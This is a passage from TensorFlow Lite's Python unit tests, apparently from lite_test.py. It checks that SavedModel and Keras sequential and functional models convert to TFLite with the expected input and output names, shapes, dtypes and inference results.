self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testOrderInputArrays(self):
"""Test a SavedModel ordering of input arrays."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputB', 'inputA'])
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('inputA', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('inputB', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 16, 16, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('add', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 16, 16, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
def testSubsetInputArrays(self):
"""Test a SavedModel with a subset of the input array names of the model."""
saved_model_dir = self._createSavedModel(shape=[1, 16, 16, 3])
# Check case where input shape is given.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir,
input_arrays=['inputA'],
input_shapes={'inputA': [1, 16, 16, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check case where input shape is None.
converter = lite.TocoConverter.from_saved_model(
saved_model_dir, input_arrays=['inputA'], input_shapes={'inputA': None})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
class FromKerasFile(test_util.TensorFlowTestCase):
def setUp(self):
keras.backend.clear_session()
def _getSequentialModel(self):
with session.Session().as_default():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
model.predict(x)
try:
fd, keras_file = tempfile.mkstemp('.h5')
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
return keras_file
def testSequentialModel(self):
"""Test a Sequential tf.keras model with default inputs."""
keras_file = self._getSequentialModel()
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('time_distributed/Reshape_1', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
def testSequentialModelInputArray(self):
"""Test a Sequential tf.keras model testing input arrays argument."""
keras_file = self._getSequentialModel()
# Invalid input array raises error.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_keras_model_file(
keras_file, input_arrays=['invalid-input'])
self.assertEqual("Invalid tensors 'invalid-input' were found.",
str(error.exception))
# Valid input array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_arrays=['dense_input'])
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
def testSequentialModelInputShape(self):
"""Test a Sequential tf.keras model testing input shapes argument."""
keras_file = self._getSequentialModel()
# Passing in shape of invalid input array has no impact as long as all input
# arrays have a shape.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_shapes={'invalid-input': [2, 3]})
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Passing in shape of valid input array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, input_shapes={'dense_input': [2, 3]})
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
# Check input shape from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertTrue(([2, 3] == input_details[0]['shape']).all())
def testSequentialModelOutputArray(self):
"""Test a Sequential tf.keras model testing output arrays argument."""
keras_file = self._getSequentialModel()
# Invalid output array raises error.
with self.assertRaises(ValueError) as error:
lite.TocoConverter.from_keras_model_file(
keras_file, output_arrays=['invalid-output'])
self.assertEqual("Invalid tensors 'invalid-output' were found.",
str(error.exception))
# Valid output array.
converter = lite.TocoConverter.from_keras_model_file(
keras_file, output_arrays=['time_distributed/Reshape_1'])
tflite_model = converter.convert()
os.remove(keras_file)
self.assertTrue(tflite_model)
def testFunctionalModel(self):
"""Test a Functional tf.keras model with default inputs."""
with session.Session().as_default():
inputs = keras.layers.Input(shape=(3,), name='input')
x = keras.layers.Dense(2)(inputs)
output = keras.layers.Dense(3)(x)
model = keras.models.Model(inputs, output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy])
x = np.random.random((1, 3))
y = np.random.random((1, 3))
model.train_on_batch(x, y)
model.predict(x)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('dense_1/BiasAdd', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
def testFunctionalModelMultipleInputs(self):
"""Test a Functional tf.keras model with multiple inputs and outputs."""
with session.Session().as_default():
a = keras.layers.Input(shape=(3,), name='input_a')
b = keras.layers.Input(shape=(3,), name='input_b')
dense = keras.layers.Dense(4, name='dense')
c = dense(a)
d = dense(b)
e = keras.layers.Dropout(0.5, name='dropout')(c)
model = keras.models.Model([a, b], [d, e])
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.mae],
loss_weights=[1., 0.5])
input_a_np = np.random.random((10, 3))
input_b_np = np.random.random((10, 3))
output_d_np = np.random.random((10, 4))
output_e_np = np.random.random((10, 4))
model.train_on_batch([input_a_np, input_b_np], [output_d_np, output_e_np])
model.predict([input_a_np, input_b_np], batch_size=5)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
os.remove(keras_file)
# Check values from converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(2, len(input_details))
self.assertEqual('input_a', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
self.assertEqual('input_b', input_details[1]['name'])
self.assertEqual(np.float32, input_details[1]['dtype'])
self.assertTrue(([1, 3] == input_details[1]['shape']).all())
self.assertEqual((0., 0.), input_details[1]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(2, len(output_details))
self.assertEqual('dense_1/BiasAdd', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 4] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
self.assertEqual('dropout/Identity', output_details[1]['name'])
self.assertEqual(np.float32, output_details[1]['dtype'])
self.assertTrue(([1, 4] == output_details[1]['shape']).all())
self.assertEqual((0., 0.), output_details[1]['quantization'])
def testFunctionalSequentialModel(self):
"""Test a Functional tf.keras model containing a Sequential model."""
with session.Session().as_default():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, input_shape=(3,)))
model.add(keras.layers.RepeatVector(3))
model.add(keras.layers.TimeDistributed(keras.layers.Dense(3)))
model = keras.models.Model(model.input, model.output)
model.compile(
loss=keras.losses.MSE,
optimizer=keras.optimizers.RMSprop(),
metrics=[keras.metrics.categorical_accuracy],
sample_weight_mode='temporal')
x = np.random.random((1, 3))
y = np.random.random((1, 3, 3))
model.train_on_batch(x, y)
model.predict(x)
model.predict(x)
fd, keras_file = tempfile.mkstemp('.h5')
try:
keras.models.save_model(model, keras_file)
finally:
os.close(fd)
# Convert to TFLite model.
converter = lite.TocoConverter.from_keras_model_file(keras_file)
tflite_model = converter.convert()
self.assertTrue(tflite_model)
# Check tensor details of converted model.
interpreter = Interpreter(model_content=tflite_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
self.assertEqual(1, len(input_details))
self.assertEqual('dense_input', input_details[0]['name'])
self.assertEqual(np.float32, input_details[0]['dtype'])
self.assertTrue(([1, 3] == input_details[0]['shape']).all())
self.assertEqual((0., 0.), input_details[0]['quantization'])
output_details = interpreter.get_output_details()
self.assertEqual(1, len(output_details))
self.assertEqual('time_distributed/Reshape_1', output_details[0]['name'])
self.assertEqual(np.float32, output_details[0]['dtype'])
self.assertTrue(([1, 3, 3] == output_details[0]['shape']).all())
self.assertEqual((0., 0.), output_details[0]['quantization'])
# Check inference of converted model.
input_data = np.array([[1, 2, 3]], dtype=np.float32)
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
tflite_result = interpreter.get_tensor(output_details[0]['index'])
keras_model = keras.models.load_model(keras_file)
keras_result = keras_model.predict(input_data)
np.testing.assert_almost_equal(tflite_result, keras_result, 5)
os.remove(keras_file)
if __name__ == '__main__':
test.main()
|
xodus7/tensorflow
|
tensorflow/contrib/lite/python/lite_test.py
|
Python
|
apache-2.0
| 45,063 | 0.003107 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.